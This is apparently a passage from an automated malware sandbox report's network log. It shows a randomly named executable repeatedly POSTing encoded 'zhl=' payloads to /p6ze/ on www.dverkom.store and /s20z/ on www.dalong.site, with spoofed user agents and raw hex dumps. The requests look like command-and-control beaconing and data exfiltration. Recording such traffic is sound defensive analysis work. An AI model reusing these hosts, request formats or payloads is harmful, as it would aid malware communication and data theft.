                                                                            Data Raw: 7a 68 6c 3d 79 42 2f 6e 41 30 38 38 79 4e 73 51 73 43 79 76 31 31 50 6f 52 69 31 57 59 53 77 47 59 46 6f 62 59 4a 67 50 2f 66 67 5a 62 73 37 36 4c 35 4d 4a 5a 2b 36 33 78 39 32 32 54 4d 61 34 32 42 76 4e 5a 59 51 56 41 65 49 78 4a 33 6a 54 34 74 4e 2b 52 76 67 57 6a 4d 7a 55 51 73 50 6d 6d 70 46 67 61 58 78 62 33 38 73 78 56 58 7a 54 64 64 4e 4b 46 68 6b 61 6e 6b 65 48 2f 34 61 67 69 74 73 44 5a 7a 4c 68 58 43 65 36 52 64 71 41 34 4c 66 38 64 50 6c 33 62 41 63 49 44 62 63 47 65 2f 4b 62 4d 33 5a 73 42 61 55 6b 64 66 66 69 57 52 54 45 42 62 4a 2f 50 63 34 58 35 46 57 61 4b 46 68 4f 33 67 3d 3d
                                                                            Data Ascii: zhl=yB/nA088yNsQsCyv11PoRi1WYSwGYFobYJgP/fgZbs76L5MJZ+63x922TMa42BvNZYQVAeIxJ3jT4tN+RvgWjMzUQsPmmpFgaXxb38sxVXzTddNKFhkankeH/4agitsDZzLhXCe6RdqA4Lf8dPl3bAcIDbcGe/KbM3ZsBaUkdffiWRTEBbJ/Pc4X5FWaKFhO3g==
                                                                            Nov 5, 2024 15:24:15.568255901 CET314INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:15 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.45573731.31.196.17804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:17.225663900 CET819OUTPOST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 79 42 2f 6e 41 30 38 38 79 4e 73 51 75 69 43 76 7a 57 58 6f 55 43 31 56 46 69 77 47 54 6c 6f 66 59 4a 6b 50 2f 63 74 47 61 61 54 36 4c 59 38 4a 59 38 53 33 39 64 32 32 47 38 61 35 70 78 76 34 5a 59 63 33 41 65 45 78 4a 33 33 54 34 74 64 2b 52 65 67 52 69 63 7a 53 63 4d 50 6f 2b 4a 46 67 61 58 78 62 33 2f 51 62 56 58 37 54 42 39 39 4b 4b 6b 49 46 6b 6b 65 45 70 49 61 67 7a 39 73 39 5a 7a 4c 58 58 41 71 63 52 65 43 41 34 4a 48 38 64 65 6c 30 4f 77 63 53 4f 37 64 71 59 4d 58 68 57 57 55 2f 65 4a 6c 4b 58 72 76 4a 58 58 43 65 51 71 6f 6f 64 63 63 6b 6b 43 66 75 48 47 63 48 73 69 37 77 5a 45 79 70 71 31 43 42 4b 35 32 45 68 34 44 75 6d 4f 51 3d
                                                                            Data Ascii: zhl=yB/nA088yNsQuiCvzWXoUC1VFiwGTlofYJkP/ctGaaT6LY8JY8S39d22G8a5pxv4ZYc3AeExJ33T4td+RegRiczScMPo+JFgaXxb3/QbVX7TB99KKkIFkkeEpIagz9s9ZzLXXAqcReCA4JH8del0OwcSO7dqYMXhWWU/eJlKXrvJXXCeQqoodcckkCfuHGcHsi7wZEypq1CBK52Eh4DumOQ=
                                                                            Nov 5, 2024 15:24:18.122412920 CET314INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:17 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.45573831.31.196.17804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:19.770385981 CET10901OUTPOST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 79 42 2f 6e 41 30 38 38 79 4e 73 51 75 69 43 76 7a 57 58 6f 55 43 31 56 46 69 77 47 54 6c 6f 66 59 4a 6b 50 2f 63 74 47 61 61 62 36 4b 75 41 4a 61 62 6d 33 2b 64 32 32 61 73 61 43 70 78 76 6c 5a 59 45 7a 41 66 35 4d 4a 78 7a 54 34 4c 52 2b 58 73 59 52 37 73 7a 53 42 63 50 70 6d 70 46 78 61 58 68 58 33 2f 41 62 56 58 37 54 42 37 35 4b 44 52 6b 46 6f 45 65 48 2f 34 61 73 69 74 74 51 5a 7a 43 69 58 41 75 71 53 76 69 41 39 61 2f 38 66 73 4e 30 4d 51 63 55 64 4c 64 79 59 4d 62 45 57 53 30 7a 65 4a 67 52 58 73 66 4a 56 57 44 65 50 5a 6b 4a 49 76 59 48 78 31 2f 36 41 45 73 30 6e 51 6a 63 66 47 2b 64 30 77 69 4d 4b 36 44 58 78 34 62 76 2f 35 6d 47 56 78 6b 59 4e 6b 64 2f 76 50 68 44 4a 6c 56 56 72 33 46 51 33 65 44 7a 45 6c 77 68 32 76 72 4f 44 69 62 4e 36 32 6d 2f 42 4d 62 6b 58 4f 33 2b 53 48 4f 79 46 4b 61 32 76 56 64 30 6b 34 32 5a 68 63 36 38 48 63 2b 47 34 31 51 75 4e 33 65 4d 51 36 79 43 58 36 75 69 73 62 45 62 54 6c 72 77 64 56 7a 78 53 71 6c 61 79 6a 7a 6c 72 76 7a 71 66 4b 35 70 6d 5a [TRUNCATED]
                                                                            Data Ascii: zhl=yB/nA088yNsQuiCvzWXoUC1VFiwGTlofYJkP/ctGaab6KuAJabm3+d22asaCpxvlZYEzAf5MJxzT4LR+XsYR7szSBcPpmpFxaXhX3/AbVX7TB75KDRkFoEeH/4asittQZzCiXAuqSviA9a/8fsN0MQcUdLdyYMbEWS0zeJgRXsfJVWDePZkJIvYHx1/6AEs0nQjcfG+d0wiMK6DXx4bv/5mGVxkYNkd/vPhDJlVVr3FQ3eDzElwh2vrODibN62m/BMbkXO3+SHOyFKa2vVd0k42Zhc68Hc+G41QuN3eMQ6yCX6uisbEbTlrwdVzxSqlayjzlrvzqfK5pmZlgjjAMJRqg+z70xjwuMdA/9OZZTfuEvPyrTqnMMqwj+WJimRqima/iHa6JKUUfvBrZ2EoWKhUvlMePnCGRzI0Kk0Cpa13nm4UrNSn1z2bWlyEMpqnB5okEkFFd+vwB6VSrELA3TaB87H/gTZ0jB8/fB4QHctv6DIcJ3qDWOCFblknN5cYb/cJoAJdbceEnctkVfFth1YsTkdWmzb9ynN5D8uF5kkIBZpjZK1B5hCa9drNge9nu26Qwej0T0dPqRGkVdtcjLyJcXshjqiYBHOy+mMqowh7X/9ZaYkbZEaP7HDNpq5spFWPG2vYCTPK8AsYjeXhZZGWLbeHMraMROZ6NO36mgqy1Tb/ErAinqxzvzhlRnWSLoZkCRxudcWA50Vv5HQ3+Ebc6D+81x2bXyihIWysTmoFjpNBAuIoHFbQP8+eXueke3h0yctLUKLaLsRal8/3RxU8FEjzNPLSJ5jSdKeTLdV40CLWOBoGdiEzRO5xkYiz9PjaWdSkZjMdkqAZSLEqtc3wG/g4l13MjoF2PrW6v2B7I73r7PB8ng3N0D7Gt8hj9e80mMIFzOH3fRG4F+Z7g0/hnEsezTaTRUki4EtIowOxYbXKqe4Xgu13DvRZaMyxabNSdWE3glUFAQ0Xhn1OnQZsTZoT+geJKJzGNwLoIfOOSuzOG [TRUNCATED]
                                                                            Nov 5, 2024 15:24:20.667485952 CET314INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:20 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.45573931.31.196.17804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:22.308820009 CET538OUTGET /p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.dverkom.store
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:23.207484961 CET330INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:23 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.455740172.96.187.60804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:28.463275909 CET793OUTPOST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 44 6e 33 4e 51 6d 39 7a 41 33 4c 4a 4f 4d 36 64 66 43 47 69 42 4b 71 4c 47 43 7a 33 56 41 77 46 59 71 64 6b 2f 4f 4b 44 4b 45 4c 33 4a 62 52 72 4e 5a 73 7a 2b 43 72 41 71 50 64 4a 78 47 70 36 47 32 50 66 44 75 44 79 4b 42 46 63 2f 33 4c 64 41 32 79 78 4d 39 62 4e 38 43 73 41 6e 34 50 69 5a 76 67 4c 71 4e 52 30 74 70 51 46 6b 48 42 51 2b 75 72 4b 2f 66 63 2f 39 4e 4c 6b 2f 33 42 71 77 39 37 37 70 76 78 47 78 7a 6a 33 69 35 69 47 64 31 75 45 70 79 6b 79 44 7a 41 4f 78 78 55 53 66 31 51 61 6f 69 41 53 71 50 30 4f 6f 52 52 47 57 58 50 42 67 4c 35 77 4b 69 38 4b 6d 6a 63 41 55 51 3d 3d
                                                                            Data Ascii: zhl=Dn3NQm9zA3LJOM6dfCGiBKqLGCz3VAwFYqdk/OKDKEL3JbRrNZsz+CrAqPdJxGp6G2PfDuDyKBFc/3LdA2yxM9bN8CsAn4PiZvgLqNR0tpQFkHBQ+urK/fc/9NLk/3Bqw977pvxGxzj3i5iGd1uEpykyDzAOxxUSf1QaoiASqP0OoRRGWXPBgL5wKi8KmjcAUQ==
                                                                            Nov 5, 2024 15:24:29.117005110 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:29 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.455741172.96.187.60804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:31.001791954 CET813OUTPOST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 44 6e 33 4e 51 6d 39 7a 41 33 4c 4a 63 38 4b 64 64 68 65 69 4b 4b 72 35 4b 69 7a 33 65 67 77 42 59 71 52 6b 2f 50 2f 65 4b 57 66 33 49 2b 56 72 4f 63 4d 7a 75 53 72 41 68 76 64 4d 38 6d 70 48 47 32 43 69 44 76 2f 79 4b 41 68 63 2f 31 54 64 41 6c 71 79 4e 74 62 50 6f 79 73 43 71 59 50 69 5a 76 67 4c 71 4e 55 52 74 70 49 46 6b 33 78 51 2b 50 72 56 33 2f 63 38 2b 4e 4c 6b 37 33 42 75 77 39 37 4a 70 74 55 54 78 78 4c 33 69 34 53 47 64 6e 47 44 38 43 6b 77 4e 54 42 51 36 30 67 64 58 6e 4a 62 70 68 55 49 71 75 77 71 67 33 41 63 48 6d 75 57 79 4c 64 44 58 6c 31 2b 72 67 68 4a 50 63 65 54 4a 61 61 78 6d 31 49 68 63 4a 72 56 35 77 76 77 6b 32 41 3d
                                                                            Data Ascii: zhl=Dn3NQm9zA3LJc8KddheiKKr5Kiz3egwBYqRk/P/eKWf3I+VrOcMzuSrAhvdM8mpHG2CiDv/yKAhc/1TdAlqyNtbPoysCqYPiZvgLqNURtpIFk3xQ+PrV3/c8+NLk73Buw97JptUTxxL3i4SGdnGD8CkwNTBQ60gdXnJbphUIquwqg3AcHmuWyLdDXl1+rghJPceTJaaxm1IhcJrV5wvwk2A=
                                                                            Nov 5, 2024 15:24:31.683357954 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:31 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.455742172.96.187.60804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:33.551889896 CET10895OUTPOST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 44 6e 33 4e 51 6d 39 7a 41 33 4c 4a 63 38 4b 64 64 68 65 69 4b 4b 72 35 4b 69 7a 33 65 67 77 42 59 71 52 6b 2f 50 2f 65 4b 57 6e 33 49 4d 64 72 4f 36 45 7a 38 43 72 41 73 50 64 4e 38 6d 70 67 47 31 79 6d 44 76 79 51 4b 44 4a 63 2f 55 7a 64 55 45 71 79 45 74 62 50 71 79 73 44 6e 34 50 33 5a 76 77 50 71 4e 45 52 74 70 49 46 6b 31 70 51 34 65 72 56 78 2f 63 2f 39 4e 4c 34 2f 33 42 47 77 39 69 38 70 74 52 6f 78 41 72 33 6a 59 43 47 63 55 75 44 2b 69 6b 2b 4f 54 42 59 36 30 6c 64 58 6e 56 74 70 67 51 32 71 75 45 71 67 32 46 36 51 47 2b 42 71 6f 68 5a 42 48 6c 63 73 44 78 4f 58 74 4c 70 4a 49 79 59 69 6e 34 51 52 62 4f 46 6c 41 58 74 2f 43 70 4f 64 46 4f 59 6b 64 52 36 31 4c 49 77 5a 73 43 61 2b 6f 30 33 30 61 50 4e 73 6b 78 48 37 77 54 55 61 73 53 79 5a 7a 78 73 59 67 6e 42 43 53 69 50 50 6b 4e 46 4d 46 6f 54 2f 69 6c 73 2f 49 74 78 52 31 6b 33 61 49 78 42 73 68 47 30 4a 41 67 58 43 61 32 7a 75 31 6e 6b 6e 77 45 4e 50 2f 58 4c 30 36 6f 73 62 48 76 50 4b 6d 6b 62 55 31 31 7a 32 45 61 56 66 63 [TRUNCATED]
                                                                            Data Ascii: zhl=Dn3NQm9zA3LJc8KddheiKKr5Kiz3egwBYqRk/P/eKWn3IMdrO6Ez8CrAsPdN8mpgG1ymDvyQKDJc/UzdUEqyEtbPqysDn4P3ZvwPqNERtpIFk1pQ4erVx/c/9NL4/3BGw9i8ptRoxAr3jYCGcUuD+ik+OTBY60ldXnVtpgQ2quEqg2F6QG+BqohZBHlcsDxOXtLpJIyYin4QRbOFlAXt/CpOdFOYkdR61LIwZsCa+o030aPNskxH7wTUasSyZzxsYgnBCSiPPkNFMFoT/ils/ItxR1k3aIxBshG0JAgXCa2zu1nknwENP/XL06osbHvPKmkbU11z2EaVfc2bPqV0k2LFuZFkUWvAURekMqTs62mqcfWZAuFlIrGsiSDbl0MDRhYiqjpo16iioSEMMAXabx6Ld3/yFvO0t7wnmYFVB0bkA0Ou6rVcv3lH/rF8ggzw2emvbDJK0RAakTMNuK6/MCAv5uAFFyGkrCHWCKzPQ7zZUIdqmrWluWyHjjIUcEqszqRdwQum8DkThLA+60433s2GDR1ne5VOSYPrnClpuX7I1LZwzbftWQH+/eYeBNJ5QIwgv8Lp5QK6OhWXIz+//eifcEDOFWPS0/ZiiNnkEG05nnag5WND2990Vg8vfQwq2fuwkDDAdY4m2XKDfQ2z0CDAWlbuuYFXhqONQYQM6qbJU+swwIV7Qy4FTxbUSAL4XmUHzLHAVIPmSjp4PnAnVODzaiIqowfFOKzOGcZObDB/IAdy1s/vEwJYtR951q08cisXb0Ft+ERpvFaDRn5SBTipRh1No4VElSVETF7C/1ukKMMDyfKeGoQ6h90rqWjFoYcQbskcnZVCMNM5rGZ4Rj0yqfVfC7Jr9Zi0LnxUumrhadbob9jfiyFJUnblndXBSQORLBz5ScgGCZiRatHfyG5VkubH74LTyv0KahYxzni16GAwzGTfZrDw2PhUhcemR6Rt3yxr2Wn1GCKdMFJzkKWjY4rxTIun9Z39ni8PSUEkR/3g [TRUNCATED]
                                                                            Nov 5, 2024 15:24:34.222491980 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:34 GMT
                                                                            server: LiteSpeed
